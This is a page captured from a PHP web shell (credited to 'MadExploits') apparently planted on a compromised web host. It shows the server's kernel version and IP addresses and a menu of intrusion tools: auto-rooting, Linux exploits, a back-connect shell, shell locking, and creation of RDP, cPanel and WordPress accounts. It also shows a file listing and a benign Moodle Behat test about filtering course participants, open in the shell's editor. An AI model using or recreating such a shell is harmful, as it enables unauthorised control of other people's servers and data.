Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.59.42
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
user /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
add_blocks.feature
865
B
-rw-r--r--
addnewuser.feature
827
B
-rw-r--r--
behat_user.php
3.19
KB
-rw-r--r--
bulk_editenrolment.feature
2.93
KB
-rw-r--r--
bulk_message.feature
1.49
KB
-rw-r--r--
course_preference.feature
1.47
KB
-rw-r--r--
custom_profile_fields.feature
10.78
KB
-rw-r--r--
delete_users.feature
4.62
KB
-rw-r--r--
edit_user_enrolment.feature
6.83
KB
-rw-r--r--
edit_user_roles.feature
1.62
KB
-rw-r--r--
edituserpassword.feature
2.38
KB
-rw-r--r--
enrol_cohort_list.feature
2.23
KB
-rw-r--r--
filter_idnumber.feature
3.18
KB
-rw-r--r--
filter_participants.feature
46.51
KB
-rw-r--r--
filter_participants_showall.fe...
6.73
KB
-rw-r--r--
full_name_display.feature
4.68
KB
-rw-r--r--
hidden_user_fields.feature
2.09
KB
-rw-r--r--
input-purpose.feature
2
KB
-rw-r--r--
name_fields.feature
3.02
KB
-rw-r--r--
participants_in_group_modes.fe...
9.9
KB
-rw-r--r--
reset_page.feature
915
B
-rw-r--r--
set_default_homepage.feature
2.54
KB
-rw-r--r--
set_email_display.feature
3.25
KB
-rw-r--r--
table_column_visibility.featur...
2.44
KB
-rw-r--r--
table_sorting.feature
3
KB
-rw-r--r--
user_grade_navigation.feature
4.61
KB
-rw-r--r--
view_full_profile.feature
5.15
KB
-rw-r--r--
view_participants.feature
15.19
KB
-rw-r--r--
view_participants_groups.featu...
3.38
KB
-rw-r--r--
view_preferences_page.feature
3.33
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : filter_participants_showall.feature
@core @core_user Feature: Course participants can be filtered to display all the users In order to filter the list of course participants As a user I need to visit the course participants page, apply the appropriate filters and show all users per page Background: Given the following "courses" exist: | fullname | shortname | | Course 1 | C1 | | Course 2 | C2 | And the following "users" exist: | username | firstname | lastname | email | | student1 | Student | 1 | student1@example.com | | student2 | Student | 2 | student2@example.com | | student3 | Student | 3 | student3@example.com | | student4 | Student | 4 | student4@example.com | | student5 | Student | 5 | student5@example.com | | student6 | Student | 6 | student6@example.com | | student7 | Student | 7 | student7@example.com | | student8 | Student | 8 | student8@example.com | | student9 | Student | 9 | student9@example.com | | student10 | Student | 10 | student10@example.com | | student11 | Student | 11 | student11@example.com | | student12 | Student | 12 | student12@example.com | | student13 | Student | 13 | student13@example.com | | student14 | Student | 14 | student14@example.com | | student15 | Student | 15 | student15@example.com | | student16 | Student | 16 | student16@example.com | | student17 | Student | 17 | student17@example.com | | student18 | Student | 18 | student18@example.com | | student19 | Student | 19 | student19@example.com | | student20 | Student | 20 | student20@example.com | | student21 | Student | 21 | student21@example.com | | student22 | Student | 22 | student22@example.com | | student23 | Student | 23 | student23@example.com | | student24 | Student | 24 | student24@example.com | | teacher1 | Teacher | 1 | teacher1@example.com | And the following "course enrolments" exist: | user | course | role | status | timeend | | student1 | C1 | student | 0 | | | student2 | C1 | student | 0 | | | student3 | C1 | student | 0 | | | student4 | C1 | student | 0 | | | student5 | C1 | student | 0 | | | student6 | C1 | student | 0 | | | student7 | C1 | student | 0 | | | student8 | C1 | student | 0 | | | student9 | C1 | student | 0 | | | student10 | C1 | student | 0 | | | student11 | C1 | student | 0 | | | student12 | C1 | student | 0 | | | student13 | C1 | student | 0 | | | student14 | C1 | student | 0 | | | student15 | C1 | student | 0 | | | student16 | C1 | student | 0 | | | student17 | C1 | student | 0 | | | student18 | C1 | student | 0 | | | student19 | C1 | student | 0 | | | student20 | C1 | student | 0 | | | student21 | C1 | student | 0 | | | student22 | C1 | student | 0 | | | student23 | C1 | student | 0 | | | student24 | C1 | student | 1 | | | student1 | C2 | student | 0 | | | student2 | C2 | student | 0 | | | student3 | C2 | student | 0 | | | teacher1 | C1 | editingteacher | 0 | | | teacher1 | C2 | editingteacher | 0 | | @javascript Scenario: Show all users in a course that match a single filter value Given I log in as "teacher1" And I am on "Course 1" course homepage And I navigate to course participants And I set the field "Match" in the "Filter 1" "fieldset" to "All" And I set the field "type" in the "Filter 1" "fieldset" to "Roles" And I set the field "Type or select..." in the "Filter 1" "fieldset" to "Student" When I click on "Apply filters" "button" Then I should see "24 participants found" And I should see "Show all 24" And I should not see "Show 20 per page" And I should not see "of the following" And I click on "Show all 24" "link" And I should see "Show 20 per page" And I should not see "Show all 24" @javascript Scenario: Show all users as a student Given I log in as "student1" And I am on "Course 1" course homepage And I navigate to course participants And I set the field "Match" in the "Filter 1" "fieldset" to "All" And I set the field "type" in the "Filter 1" "fieldset" to "Roles" And I set the field "Type or select..." in the "Filter 1" "fieldset" to "Student" When I click on "Apply filters" "button" Then I should see "23 participants found" And I should see "Show all 23" And I should not see "Show 20 per page" And I click on "Show all 23" "link" And I should see "Show 20 per page" And I should not see "Show all 23" @javascript Scenario: Apply one value for more than one filter and show all matching users Given I log in as "teacher1" And I am on "Course 1" course homepage And I navigate to course participants And I click on "Add condition" "button" And I set the field "Match" to "All" And I set the field "Match" in the "Filter 1" "fieldset" to "Any" And I set the field "type" in the "Filter 1" "fieldset" to "Roles" And I set the field "Type or select..." in the "Filter 1" "fieldset" to "Student" And I set the field "Match" in the "Filter 2" "fieldset" to "Any" And I set the field "type" in the "Filter 2" "fieldset" to "Status" And I set the field "Type or select..." in the "Filter 2" "fieldset" to "Active" When I click on "Apply filters" "button" And I click on "Show all 23" "link" Then I should see "23 participants found" And I should see "Show 20 per page" And I should see "of the following" And I should see "Student 1" And I should not see "Student 24" And I should not see "Show all 23"
Close